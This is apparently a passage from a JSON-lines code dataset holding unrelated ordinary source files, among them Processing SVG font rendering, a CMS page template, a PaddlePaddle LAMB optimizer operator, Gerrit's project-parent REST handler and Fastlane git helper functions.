FontGlyph(this, elem, this);\n if (fg.isLegit()) {\n if (fg.name != null) {\n namedGlyphs.put(fg.name, fg);\n }\n if (fg.unicode != 0) {\n unicodeGlyphs.put(Character.valueOf(fg.unicode), fg);\n }\n }\n glyphs[glyphCount++] = fg;\n\n } else if (name.equals(\"missing-glyph\")) {\n// System.out.println(\"got missing glyph inside \");\n missingGlyph = new FontGlyph(this, elem, this);\n } else if (name.equals(\"font-face\")) {\n face = new FontFace(this, elem);\n } else {\n System.err.println(\"Ignoring \" + name + \" inside \");\n }\n }\n }\n\n\n protected void drawShape() {\n // does nothing for fonts\n }\n\n\n public void drawString(PGraphics g, String str, float x, float y, float size) {\n // 1) scale by the 1.0/unitsPerEm\n // 2) scale up by a font size\n g.pushMatrix();\n float s = size / face.unitsPerEm;\n //System.out.println(\"scale is \" + s);\n // swap y coord at the same time, since fonts have y=0 at baseline\n g.translate(x, y);\n g.scale(s, -s);\n char[] c = str.toCharArray();\n for (int i = 0; i < c.length; i++) {\n // call draw on each char (pulling it w/ the unicode table)\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c[i]));\n if (fg != null) {\n fg.draw(g);\n // add horizAdvX/unitsPerEm to the x coordinate along the way\n g.translate(fg.horizAdvX, 0);\n } else {\n System.err.println(\"'\" + c[i] + \"' not available.\");\n }\n }\n g.popMatrix();\n }\n\n\n public void drawChar(PGraphics g, char c, float x, float y, float size) {\n g.pushMatrix();\n float s = size / face.unitsPerEm;\n g.translate(x, y);\n g.scale(s, -s);\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c));\n if (fg != null) g.shape(fg);\n g.popMatrix();\n }\n\n\n public float textWidth(String str, float size) {\n float w = 0;\n char[] c = str.toCharArray();\n for (int i = 0; i < c.length; i++) {\n // call draw on each char (pulling it w/ the unicode table)\n FontGlyph fg = unicodeGlyphs.get(Character.valueOf(c[i]));\n if (fg != null) {\n w += (float) fg.horizAdvX / face.unitsPerEm;\n }\n }\n return w * size;\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static class FontFace extends PShapeSVG {\n int horizOriginX; // dflt 0\n int horizOriginY; // dflt 0\n // int horizAdvX; // no dflt?\n int vertOriginX; // dflt horizAdvX/2\n int vertOriginY; // dflt ascent\n int vertAdvY; // dflt 1em (unitsPerEm value)\n\n String fontFamily;\n int fontWeight; // can also be normal or bold (also comma separated)\n String fontStretch;\n int unitsPerEm; // dflt 1000\n int[] panose1; // dflt \"0 0 0 0 0 0 0 0 0 0\"\n int ascent;\n int descent;\n int[] bbox; // spec says comma separated, tho not w/ forge\n int underlineThickness;\n int underlinePosition;\n //String unicodeRange; // gonna ignore for now\n\n\n public FontFace(PShapeSVG parent, XML properties) {\n super(parent, properties, true);\n\n unitsPerEm = properties.getInt(\"units-per-em\", 1000);\n }\n\n\n protected void drawShape() {\n // nothing to draw in the font face attribute\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n static public class FontGlyph extends PShapeSVG { // extends Path\n public String name;\n char unicode;\n int horizAdvX;\n\n public FontGlyph(PShapeSVG parent, XML properties, Font font) {\n super(parent, properties, true);\n super.parsePath(); // ??\n\n name = properties.getString(\"glyph-name\");\n String u = properties.getString(\"unicode\");\n unicode = 0;\n if (u != null) {\n if (u.length() == 1) {\n unicode = u.charAt(0);\n //System.out.println(\"unicode for \" + name + \" is \" + u);\n } else {\n System.err.println(\"unicode for \" + name +\n \" is more than one char: \" + u);\n }\n }\n if (properties.hasAttribute(\"horiz-adv-x\")) {\n horizAdvX = properties.getInt(\"horiz-adv-x\");\n } else {\n horizAdvX = font.horizAdvX;\n }\n }\n\n\n protected boolean isLegit() { // TODO need a better way to handle this...\n return vertexCount != 0;\n }\n }\n\n\n // . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .\n\n\n /**\n * Get a particular element based on its SVG ID. When editing SVG by hand,\n * this is the id=\"\" tag on any SVG element. When editing from Illustrator,\n * these IDs can be edited by expanding the layers palette. The names used\n * in the layers palette, both for the layers or the shapes and groups\n * beneath them can be used here.\n *
\n   * // This code grabs \"Layer 3\" and the shapes beneath it.\n   * PShape layer3 = svg.getChild(\"Layer 3\");\n   * 
\n */\n @Override\n public PShape getChild(String name) {\n PShape found = super.getChild(name);\n if (found == null) {\n // Otherwise try with underscores instead of spaces\n // (this is how Illustrator handles spaces in the layer names).\n found = super.getChild(name.replace(' ', '_'));\n }\n // Set bounding box based on the parent bounding box\n if (found != null) {\n// found.x = this.x;\n// found.y = this.y;\n found.width = this.width;\n found.height = this.height;\n }\n return found;\n }\n\n\n /**\n * Prints out the SVG document. Useful for parsing.\n */\n public void print() {\n PApplet.println(element.toString());\n }\n}\n"} {"text": "\n\n\n\n${channel.title!channel.name} - ${site.name} - Powered by JEECMS\n\n\n\n\n\n\n\n\n\n\n\n\n\n[#include \"../include/页头顶栏.html\"/]\n[#include \"../include/页头导航栏.html\"/]\n
\n\t
\n \t [@cms_content_list typeId='3' styleList='3-1' titLen='20' count='5' flashWidth='355' flashHeight='273' channelId='46' textHeight='20' channelOption='1' tpl='2'/] \n
\n
\n \t [@cms_content_list channelId='46' typeId='2' titLen='10' recommend='1' channelOption='1' count='3' append='...' descLen='25']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list] \n
\n
\n \t

视频排行榜

\n \n
\n
\n
\n
\n
\n\t
\n
\n

\n [@cms_channel id='49']\n ${tag_bean.name}\n [/@cms_channel]\n

\n
\n [@cms_content_list channelId='49' typeId='2' titLen='8' channelOption='1' count='2' append='...' descLen='13']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list]\n
\n
\n \t

一周最火爆视频

\n [@cms_content_list channelId='46' typeId='2' titLen='8' channelOption='1' count='4' append='...' descLen='13' orderBy='7']\n [#list tag_list as a]\n
\n \t
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list] \n
\n
\n
\n

\n [@cms_channel id='50']\n ${tag_bean.name}\n [/@cms_channel]\n

\n
\n \t [@cms_content_list channelId='50' typeId='2' titLen='8' channelOption='1' count='2' append='...' descLen='13']\n [#list tag_list as a]\n
\n
[@text_cut s=a.title len=titLen append=append/]
\n
\n
[@text_cut s=a.desc len=descLen append=append/]
\n
\n [/#list]\n [/@cms_content_list]\n
\n
\n
\n \t
\n [@cms_channel id='51']\n

${tag_bean.name}

更多\n [/@cms_channel] \n
\n
[@cms_content_list styleList='2-2' titLen='9' count='12' rollCols='6' rollDisplayHeight='110' rollLineHeight='110' rollSpeed='18' rollSleepTime='60' rollRows='1' channelOption='1' tpl='2' rightPadding='5' topPadding='5' picHeight='110' channelId='46' typeId='2'/]
\n
\n
\n
\n
\n\t
\n [@cms_channel id='52']\n \t
${tag_bean.name}更多>>
\n [/@cms_channel] \n \n
\n
\n \t
视频推荐
\n \n
\n
\n
\n[#include \"../include/页脚友情链接栏.html\"/]\n[#include \"../include/页脚信息栏.html\"/]\n\n\n"} {"text": "source.. = src/\noutput.. = bin/\nbin.includes = META-INF/,\\\n .,\\\n plugin.xml\n"} {"text": "TEMPLATE = app\nTARGET = test-selection\nCONFIG += qt warn_on thread c++14\nQT += widgets core gui qml quick quickcontrols2\nINCLUDEPATH += ../../src\nINCLUDEPATH += ../../QuickContainers/src\n\ninclude(../../src/quickqanava.pri)\n\nSOURCES += ./selection.cpp\nOTHER_FILES += ./selection.qml \\\n ./CustomSelectionItem.qml\n\nRESOURCES += ./selection.qrc\n"} {"text": "import * as debug from \"debug\";\nimport {COMPILER_RT_FILE, LIBC_RT_FILE} from \"speedyjs-runtime\";\nimport {execBinaryen} from \"./tools\";\n\nconst LOG = debug(\"external-tools/binaryen-s2wasm\");\nconst EXECUTABLE_NAME = \"s2wasm\";\n\n/**\n * Creates the .wast file from the given s file\n * @param sFile the s file\n * @param wastFile the name of the wast file\n * @param options options passed to s2wasm that affect the generated module\n * @return the path to the .wast file. The caller is responsible for either deleting the working directory or the returned\n * file.\n */\nexport function s2wasm(sFile: string, wastFile: string, { globalBase, initialMemory }: { globalBase: number, initialMemory: number}): string {\n LOG(`Compile ${sFile} to wast file`);\n\n const args = [\n sFile,\n \"--emscripten-glue\",\n `--global-base=${globalBase}`,\n `--initial-memory=${initialMemory}`,\n \"--allow-memory-growth\",\n \"-o\", wastFile,\n \"-l\", COMPILER_RT_FILE,\n \"-l\", LIBC_RT_FILE\n ];\n\n LOG(execBinaryen(EXECUTABLE_NAME, args));\n return wastFile;\n}\n"} {"text": "/* Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.\n\nLicensed under the Apache License, Version 2.0 (the \"License\");\nyou may not use this file except in compliance with the License.\nYou may obtain a copy of the License at\n\n http://www.apache.org/licenses/LICENSE-2.0\n\nUnless required by applicable law or agreed to in writing, software\ndistributed under the License is distributed on an \"AS IS\" BASIS,\nWITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\nSee the License for the specific language governing permissions and\nlimitations under the License. */\n\n#include \"paddle/fluid/operators/optimizers/lamb_op.h\"\n\nnamespace paddle {\nnamespace operators {\n\nclass LambOp : public framework::OperatorWithKernel {\n public:\n using framework::OperatorWithKernel::OperatorWithKernel;\n\n void InferShape(framework::InferShapeContext* ctx) const override {\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Param\"), true,\n platform::errors::NotFound(\n \"Input(Param) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Grad\"), true,\n platform::errors::NotFound(\n \"Input(Grad) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Moment1\"), true,\n platform::errors::NotFound(\n \"Input(Moment1) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Moment2\"), true,\n platform::errors::NotFound(\n \"Input(Moment2) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"LearningRate\"), true,\n platform::errors::NotFound(\n \"Input(LearningRate) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Beta1Pow\"), true,\n platform::errors::NotFound(\n \"Input(Beta1Pow) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasInput(\"Beta2Pow\"), true,\n platform::errors::NotFound(\n \"Input(Beta2Pow) of LambOp should not be null.\"));\n\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"ParamOut\"), true,\n platform::errors::NotFound(\n \"Output(ParamOut) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"Moment1Out\"), true,\n platform::errors::NotFound(\n \"Output(Moment1Out) of LambOp should not be null.\"));\n PADDLE_ENFORCE_EQ(ctx->HasOutput(\"Moment2Out\"), true,\n platform::errors::NotFound(\n \"Output(Moment2Out) of LambOp should not be null.\"));\n\n auto lr_dims = ctx->GetInputDim(\"LearningRate\");\n PADDLE_ENFORCE_NE(\n framework::product(lr_dims), 0,\n platform::errors::InvalidArgument(\n \"The number of LearningRate shall not be 0, but received %d. Maybe \"\n \"the Input variable LearningRate has not \"\n \"been initialized. You may need to confirm \"\n \"if you put exe.run(startup_program) \"\n \"after optimizer.minimize function.\",\n framework::product(lr_dims)));\n PADDLE_ENFORCE_EQ(\n framework::product(lr_dims), 1,\n platform::errors::InvalidArgument(\n \"Learning rate should have 1 dimension, but received %d.\",\n framework::product(lr_dims)));\n auto beta1_pow_dims = ctx->GetInputDim(\"Beta1Pow\");\n PADDLE_ENFORCE_GE(framework::product(beta1_pow_dims), 1,\n platform::errors::InvalidArgument(\n \"The size of Beta1 power accumulator should be \"\n \"greater than 0, but received %d.\",\n framework::product(beta1_pow_dims)));\n auto beta2_pow_dims = ctx->GetInputDim(\"Beta2Pow\");\n PADDLE_ENFORCE_GE(framework::product(beta2_pow_dims), 1,\n platform::errors::InvalidArgument(\n \"The size of Beta2 power accumulator should be \"\n \"greater than 0, but received %d.\",\n framework::product(beta2_pow_dims)));\n\n auto param_dims = ctx->GetInputDim(\"Param\");\n if (ctx->GetInputsVarType(\"Grad\")[0] ==\n framework::proto::VarType::LOD_TENSOR) {\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Grad\"),\n platform::errors::InvalidArgument(\n \"Param and Grad input of LambOp should have same dimension. But \"\n \"received Param dims: [%s], Grad dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Grad\")));\n }\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Moment1\"),\n platform::errors::InvalidArgument(\n \"Param and Moment1 input of LambOp should have same dimension. But \"\n \"received Param dims: [%s], Moment1 dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Moment1\")));\n PADDLE_ENFORCE_EQ(\n param_dims, ctx->GetInputDim(\"Moment2\"),\n platform::errors::InvalidArgument(\n \"Param and Moment2 input of LambOp should have same dimension. But \"\n \"received Param dims: [%s], Moment2 dims: [%s].\",\n param_dims, ctx->GetInputDim(\"Moment2\")));\n\n ctx->SetOutputDim(\"ParamOut\", param_dims);\n ctx->SetOutputDim(\"Moment1Out\", param_dims);\n ctx->SetOutputDim(\"Moment2Out\", param_dims);\n }\n\n framework::OpKernelType GetExpectedKernelType(\n const framework::ExecutionContext& ctx) const {\n auto input_data_type =\n OperatorWithKernel::IndicateVarDataType(ctx, \"Param\");\n return framework::OpKernelType(input_data_type, ctx.GetPlace());\n }\n};\n\nclass LambOpMaker : public framework::OpProtoAndCheckerMaker {\n public:\n void Make() override {\n AddInput(\"Param\",\n \"(LoDTensor, default LoDTensor) \"\n \"Input parameter that has to be updated.\");\n AddInput(\"Grad\",\n \"(LoDTensor, default LoDTensor) \"\n \"Input gradient of the parameter.\");\n AddInput(\"LearningRate\", \"(Tensor) Learning rate.\");\n AddInput(\"Moment1\", \"(Tensor) Input first moment.\");\n AddInput(\"Moment2\", \"(Tensor) Input second moment.\");\n AddInput(\"Beta1Pow\", \"(Tensor) Input beta1 power accumulator.\");\n AddInput(\"Beta2Pow\", \"(Tensor) Input beta2 power accumulator.\");\n\n AddOutput(\"ParamOut\", \"(Tensor) Output parameter.\");\n AddOutput(\"Moment1Out\", \"(Tensor) Output first moment.\");\n AddOutput(\"Moment2Out\", \"(Tensor) Output second moment.\");\n AddAttr(\"weight_decay\", \"(float) Weight decay rate.\");\n AddAttr(\"beta1\",\n \"(float, default 0.9) The exponential decay rate for the \"\n \"1st moment estimates.\")\n .SetDefault(0.9);\n AddAttr(\"beta2\",\n \"(float, default 0.999) The exponential decay rate for the \"\n \"2nd moment estimates.\")\n .SetDefault(0.999);\n AddAttr(\"epsilon\",\n \"(float, default 1.0e-6) \"\n \"Constant for numerical stability.\")\n .SetDefault(1.0e-6f);\n\n AddComment(R\"DOC(\nLAMB (Layer-wise Adaptive Moments optimizer for Batching training) Optimizer.\n\nLAMB Optimizer is designed to scale up the batch size of training without losing \naccuracy, which supports adaptive element-wise updating and accurate layer-wise \ncorrection. For more information, please refer to https://arxiv.org/abs/1904.00962.\n\nThe updating of parameters follows:\n\n$$\nm_t &= \\beta_1 m_{t - 1}+ (1 - \\beta_1)g_t \\\\\n\nv_t &= \\beta_2 v_{t - 1} + (1 - \\beta_2)g_t^2 \\\\\n\nr_t &= \\frac{m_t}{\\sqrt{v_t}+\\epsilon} \\\\\n\nw_t &= w_{t-1} -\\eta_t \\frac{\\left \\| w_{t-1}\\right \\|}{\\left \\| r_t + \\lambda w_{t-1}\\right \\|} (r_t + \\lambda w_{t-1})\n$$\n\nwhere $m$ is the 1st moment, and $v$ the 2nd moment, $\\eta$ the \nlearning rate, $\\lambda$ the weight decay rate.\n)DOC\");\n }\n};\n\n} // namespace operators\n} // namespace paddle\n\nnamespace ops = paddle::operators;\nREGISTER_OP_WITHOUT_GRADIENT(lamb, ops::LambOp, ops::LambOpMaker);\nREGISTER_OP_CPU_KERNEL(\n lamb, ops::LambOpKernel,\n ops::LambOpKernel);\n"} {"text": "# Copyright 2019 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n# NOTE: This file is auto generated by the elixir code generator program.\n# Do not edit this file manually.\n\ndefmodule GoogleApi.ServiceUser.V1.Model.Operation do\n @moduledoc \"\"\"\n This resource represents a long-running operation that is the result of a\n network API call.\n\n ## Attributes\n\n * `done` (*type:* `boolean()`, *default:* `nil`) - If the value is `false`, it means the operation is still in progress.\n If `true`, the operation is completed, and either `error` or `response` is\n available.\n * `error` (*type:* `GoogleApi.ServiceUser.V1.Model.Status.t`, *default:* `nil`) - The error result of the operation in case of failure or cancellation.\n * `metadata` (*type:* `map()`, *default:* `nil`) - Service-specific metadata associated with the operation. It typically\n contains progress information and common metadata such as create time.\n Some services might not provide such metadata. Any method that returns a\n long-running operation should document the metadata type, if any.\n * `name` (*type:* `String.t`, *default:* `nil`) - The server-assigned name, which is only unique within the same service that\n originally returns it. If you use the default HTTP mapping, the\n `name` should be a resource name ending with `operations/{unique_id}`.\n * `response` (*type:* `map()`, *default:* `nil`) - The normal response of the operation in case of success. If the original\n method returns no data on success, such as `Delete`, the response is\n `google.protobuf.Empty`. If the original method is standard\n `Get`/`Create`/`Update`, the response should be the resource. For other\n methods, the response should have the type `XxxResponse`, where `Xxx`\n is the original method name. For example, if the original method name\n is `TakeSnapshot()`, the inferred response type is\n `TakeSnapshotResponse`.\n \"\"\"\n\n use GoogleApi.Gax.ModelBase\n\n @type t :: %__MODULE__{\n :done => boolean(),\n :error => GoogleApi.ServiceUser.V1.Model.Status.t(),\n :metadata => map(),\n :name => String.t(),\n :response => map()\n }\n\n field(:done)\n field(:error, as: GoogleApi.ServiceUser.V1.Model.Status)\n field(:metadata, type: :map)\n field(:name)\n field(:response, type: :map)\nend\n\ndefimpl Poison.Decoder, for: GoogleApi.ServiceUser.V1.Model.Operation do\n def decode(value, options) do\n GoogleApi.ServiceUser.V1.Model.Operation.decode(value, options)\n end\nend\n\ndefimpl Poison.Encoder, for: GoogleApi.ServiceUser.V1.Model.Operation do\n def encode(value, options) do\n GoogleApi.Gax.ModelBase.encode(value, options)\n end\nend\n"} {"text": "//\n// FirstViewController.m\n// MBProgressHUD-JDragonDemo\n//\n// Created by JDragon on 2017/1/17.\n// Copyright © 2017年 JDragon. All rights reserved.\n//\n\n#import \"FirstViewController.h\"\n#import \n\n@interface FirstViewController ()\n\n@property(nonatomic,strong) NSArray *titleArray;\n\n\n@end\n\n@implementation FirstViewController\n-(NSArray*)titleArray\n{\n return @[@\"window加载弹窗\",@\"view加载弹窗\",@\"window展示信息\",@\"view展示信息\",@\"成功展示弹窗\",@\"警告展示弹窗\",@\"错误展示弹窗\",@\"信息展示弹窗\"];\n}\n- (void)viewDidLoad {\n [super viewDidLoad];\n UITableView *tab = [self.view viewWithTag:98];\n tab.tableFooterView = [UIView new];\n \n \n UIBarButtonItem *item = [[UIBarButtonItem alloc]initWithTitle:@\"aa\" style:UIBarButtonItemStylePlain target:self action:@selector(didClickAction)];\n \n self.navigationItem.leftBarButtonItem = item;\n \n\n // Do any additional setup after loading the view, typically from a nib.\n}\n-(void)didClickAction\n{\n NSLog(@\"dawwad\");\n}\n-(void)didaaa\n{\n NSLog(@\"dddd\");\n \n}\n-(NSInteger)tableView:(UITableView *)tableView numberOfRowsInSection:(NSInteger)section\n{\n return 8;\n}\n-(UITableViewCell*)tableView:(UITableView *)tableView cellForRowAtIndexPath:(NSIndexPath *)indexPath\n{\n UITableViewCell *cell = [tableView dequeueReusableCellWithIdentifier:@\"cellone\"];\n cell.textLabel.text =self.titleArray[indexPath.row];\n\n return cell;\n}\n-(void)tableView:(UITableView *)tableView didSelectRowAtIndexPath:(NSIndexPath *)indexPath\n{\n switch (indexPath.row) {\n case 0:\n [MBProgressHUD showActivityMessageInWindow:nil];\n break;\n case 1:\n [MBProgressHUD showActivityMessageInView:nil];\n\n break;\n case 2:\n [MBProgressHUD showTipMessageInWindow:@\"在window\"];\n break;\n case 3:\n [MBProgressHUD showTipMessageInView:@\"在View\"];\n\n break;\n case 4:\n [MBProgressHUD showSuccessMessage:@\"加载成功\"];\n break;\n case 5:\n [MBProgressHUD showWarnMessage:@\"显示警告\"];\n break;\n case 6:\n [MBProgressHUD showErrorMessage:@\"显示错误\"];\n break;\n case 7:\n [MBProgressHUD showInfoMessage:@\"显示信息\"];\n break;\n \n default:\n break;\n }\n [self performSelector:@selector(dismiss) withObject:nil afterDelay:2];\n}\n-(void)dismiss\n{\n \n [MBProgressHUD hideHUD];\n \n}\n- (void)didReceiveMemoryWarning {\n [super didReceiveMemoryWarning];\n // Dispose of any resources that can be recreated.\n}\n\n\n@end\n"} {"text": "# extends 'profile/profile_base.html'\n# import 'macro/forms.html' as forms\n\n# block profile_content\n
\n {{form.csrf_token}}\n {{forms.text_field(form.name, autofocus=True)}}\n # include 'user/user_email_field.html'\n\n
\n \n
\n
\n# endblock\n"} {"text": "// Copyright (C) 2012 The Android Open Source Project\n//\n// Licensed under the Apache License, Version 2.0 (the \"License\");\n// you may not use this file except in compliance with the License.\n// You may obtain a copy of the License at\n//\n// http://www.apache.org/licenses/LICENSE-2.0\n//\n// Unless required by applicable law or agreed to in writing, software\n// distributed under the License is distributed on an \"AS IS\" BASIS,\n// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n// See the License for the specific language governing permissions and\n// limitations under the License.\n\npackage com.google.gerrit.server.project;\n\nimport static com.google.common.base.Preconditions.checkNotNull;\n\nimport com.google.common.base.MoreObjects;\nimport com.google.common.base.Strings;\nimport com.google.common.collect.Iterables;\nimport com.google.gerrit.extensions.api.projects.ParentInput;\nimport com.google.gerrit.extensions.restapi.AuthException;\nimport com.google.gerrit.extensions.restapi.BadRequestException;\nimport com.google.gerrit.extensions.restapi.ResourceConflictException;\nimport com.google.gerrit.extensions.restapi.ResourceNotFoundException;\nimport com.google.gerrit.extensions.restapi.RestModifyView;\nimport com.google.gerrit.extensions.restapi.UnprocessableEntityException;\nimport com.google.gerrit.reviewdb.client.Project;\nimport com.google.gerrit.server.IdentifiedUser;\nimport com.google.gerrit.server.config.AllProjectsName;\nimport com.google.gerrit.server.config.AllUsersName;\nimport com.google.gerrit.server.git.MetaDataUpdate;\nimport com.google.gerrit.server.git.ProjectConfig;\nimport com.google.gerrit.server.permissions.GlobalPermission;\nimport com.google.gerrit.server.permissions.PermissionBackend;\nimport com.google.gerrit.server.permissions.PermissionBackendException;\nimport com.google.inject.Inject;\nimport com.google.inject.Singleton;\nimport java.io.IOException;\nimport org.eclipse.jgit.errors.ConfigInvalidException;\nimport org.eclipse.jgit.errors.RepositoryNotFoundException;\n\n@Singleton\npublic class SetParent implements RestModifyView {\n private final ProjectCache cache;\n private final PermissionBackend permissionBackend;\n private final MetaDataUpdate.Server updateFactory;\n private final AllProjectsName allProjects;\n private final AllUsersName allUsers;\n\n @Inject\n SetParent(\n ProjectCache cache,\n PermissionBackend permissionBackend,\n MetaDataUpdate.Server updateFactory,\n AllProjectsName allProjects,\n AllUsersName allUsers) {\n this.cache = cache;\n this.permissionBackend = permissionBackend;\n this.updateFactory = updateFactory;\n this.allProjects = allProjects;\n this.allUsers = allUsers;\n }\n\n @Override\n public String apply(ProjectResource rsrc, ParentInput input)\n throws AuthException, ResourceConflictException, ResourceNotFoundException,\n UnprocessableEntityException, IOException, PermissionBackendException,\n BadRequestException {\n return apply(rsrc, input, true);\n }\n\n public String apply(ProjectResource rsrc, ParentInput input, boolean checkIfAdmin)\n throws AuthException, ResourceConflictException, ResourceNotFoundException,\n UnprocessableEntityException, IOException, PermissionBackendException,\n BadRequestException {\n IdentifiedUser user = rsrc.getUser().asIdentifiedUser();\n String parentName =\n MoreObjects.firstNonNull(Strings.emptyToNull(input.parent), allProjects.get());\n validateParentUpdate(rsrc.getProjectState().getNameKey(), user, parentName, checkIfAdmin);\n try (MetaDataUpdate md = updateFactory.create(rsrc.getNameKey())) {\n ProjectConfig config = ProjectConfig.read(md);\n Project project = config.getProject();\n project.setParentName(parentName);\n\n String msg = Strings.emptyToNull(input.commitMessage);\n if (msg == null) {\n msg = String.format(\"Changed parent to %s.\\n\", parentName);\n } else if (!msg.endsWith(\"\\n\")) {\n msg += \"\\n\";\n }\n md.setAuthor(user);\n md.setMessage(msg);\n config.commit(md);\n cache.evict(rsrc.getProjectState().getProject());\n\n Project.NameKey parent = project.getParent(allProjects);\n checkNotNull(parent);\n return parent.get();\n } catch (RepositoryNotFoundException notFound) {\n throw new ResourceNotFoundException(rsrc.getName());\n } catch (ConfigInvalidException e) {\n throw new ResourceConflictException(\n String.format(\"invalid project.config: %s\", e.getMessage()));\n }\n }\n\n public void validateParentUpdate(\n Project.NameKey project, IdentifiedUser user, String newParent, boolean checkIfAdmin)\n throws AuthException, ResourceConflictException, UnprocessableEntityException,\n PermissionBackendException, BadRequestException {\n if (checkIfAdmin) {\n permissionBackend.user(user).check(GlobalPermission.ADMINISTRATE_SERVER);\n }\n\n if (project.equals(allUsers) && !allProjects.get().equals(newParent)) {\n throw new BadRequestException(\n String.format(\"%s must inherit from %s\", allUsers.get(), allProjects.get()));\n }\n\n if (project.equals(allProjects)) {\n throw new ResourceConflictException(\"cannot set parent of \" + allProjects.get());\n }\n\n newParent = Strings.emptyToNull(newParent);\n if (newParent != null) {\n ProjectState parent = cache.get(new Project.NameKey(newParent));\n if (parent == null) {\n throw new UnprocessableEntityException(\"parent project \" + newParent + \" not found\");\n }\n\n if (parent.getName().equals(project.get())) {\n throw new ResourceConflictException(\"cannot set parent to self\");\n }\n\n if (Iterables.tryFind(\n parent.tree(),\n p -> {\n return p.getNameKey().equals(project);\n })\n .isPresent()) {\n throw new ResourceConflictException(\n \"cycle exists between \" + project.get() + \" and \" + parent.getName());\n }\n }\n }\n}\n"} {"text": "module Fastlane\n module Actions\n GIT_MERGE_COMMIT_FILTERING_OPTIONS = [:include_merges, :exclude_merges, :only_include_merges].freeze\n\n def self.git_log_between(pretty_format, from, to, merge_commit_filtering, date_format = nil, ancestry_path)\n command = %w(git log)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n command << '--ancestry-path' if ancestry_path\n command << \"#{from}...#{to}\"\n command << git_log_merge_commit_filtering_option(merge_commit_filtering)\n # \"*command\" syntax expands \"command\" array into variable arguments, which\n # will then be individually shell-escaped by Actions.sh.\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.git_log_last_commits(pretty_format, commit_count, merge_commit_filtering, date_format = nil, ancestry_path)\n command = %w(git log)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n command << '--ancestry-path' if ancestry_path\n command << '-n' << commit_count.to_s\n command << git_log_merge_commit_filtering_option(merge_commit_filtering)\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.last_git_tag_hash(tag_match_pattern = nil)\n tag_pattern_param = tag_match_pattern ? \"=#{tag_match_pattern}\" : ''\n Actions.sh('git', 'rev-list', \"--tags#{tag_pattern_param}\", '--max-count=1').chomp\n rescue\n nil\n end\n\n def self.last_git_tag_name(match_lightweight = true, tag_match_pattern = nil)\n hash = last_git_tag_hash(tag_match_pattern)\n # If hash is nil (command fails), \"git describe\" command below will still\n # run and provide some output, although it's definitely not going to be\n # anything reasonably expected. Bail out early.\n return unless hash\n\n command = %w(git describe)\n command << '--tags' if match_lightweight\n command << hash\n command << '--match' if tag_match_pattern\n command << tag_match_pattern if tag_match_pattern\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n def self.last_git_commit_dict\n return nil if last_git_commit_formatted_with('%an').nil?\n\n {\n author: last_git_commit_formatted_with('%an'),\n author_email: last_git_commit_formatted_with('%ae'),\n message: last_git_commit_formatted_with('%B'),\n commit_hash: last_git_commit_formatted_with('%H'),\n abbreviated_commit_hash: last_git_commit_formatted_with('%h')\n }\n end\n\n # Gets the last git commit information formatted into a String by the provided\n # pretty format String. See the git-log documentation for valid format placeholders\n def self.last_git_commit_formatted_with(pretty_format, date_format = nil)\n command = %w(git log -1)\n command << \"--pretty=#{pretty_format}\"\n command << \"--date=#{date_format}\" if date_format\n Actions.sh(*command.compact, log: false).chomp\n rescue\n nil\n end\n\n # @deprecated Use git_author_email instead\n # Get the author email of the last git commit\n # DEPRECATED: Use git_author_email instead.\n def self.git_author\n UI.deprecated('`git_author` is deprecated. Please use `git_author_email` instead.')\n git_author_email\n end\n\n # Get the author email of the last git commit\n def self.git_author_email\n s = last_git_commit_formatted_with('%ae')\n return s if s.to_s.length > 0\n return nil\n end\n\n # Returns the unwrapped subject and body of the last commit\n # DEPRECATED: Use last_git_commit_message instead.\n def self.last_git_commit\n UI.important('`last_git_commit` is deprecated. Please use `last_git_commit_message` instead.')\n last_git_commit_message\n end\n\n # Returns the unwrapped subject and body of the last commit\n def self.last_git_commit_message\n s = (last_git_commit_formatted_with('%B') || \"\").strip\n return s if s.to_s.length > 0\n nil\n end\n\n # Get the hash of the last commit\n def self.last_git_commit_hash(short)\n format_specifier = short ? '%h' : 